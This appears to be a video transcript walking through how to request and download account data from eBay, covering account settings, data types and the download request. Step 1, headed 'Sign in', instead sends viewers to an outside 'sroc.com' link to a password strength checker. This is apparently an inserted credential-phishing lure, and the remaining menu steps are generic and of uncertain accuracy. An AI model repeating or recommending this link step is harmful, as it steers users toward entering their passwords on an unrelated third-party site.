Downloading your account data from eBay can help you keep track of your transactions and manage your information. Follow these steps to easily access and download your account data. Step 1. Sign in. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Go to account settings. Once signed in, navigate to your account settings. You can find this by clicking on your username or profile icon, usually located in the upper right corner of the page. From the drop-down menu, select Account Settings. Step 3. Access Download Data option. In the Account Settings menu, look for the option labeled Download Data or Data Privacy. This section is where you can manage your data preferences and request a download of your account information. Step 4. Choose Data Type. After selecting the download option, you will be presented with various types of data you can download, such as purchase history, selling activity, and account settings. Choose the specific data you want to download by checking the relevant boxes. Step 5. Request Download. Once you have selected the data types, click on the button to request the download. eBay may take some time to prepare your data, and you will receive a notification or email when your download is ready. Follow the instructions provided to download your data file. By following these steps, you can successfully download your account data from eBay. This process helps you keep your records organized and accessible for future reference.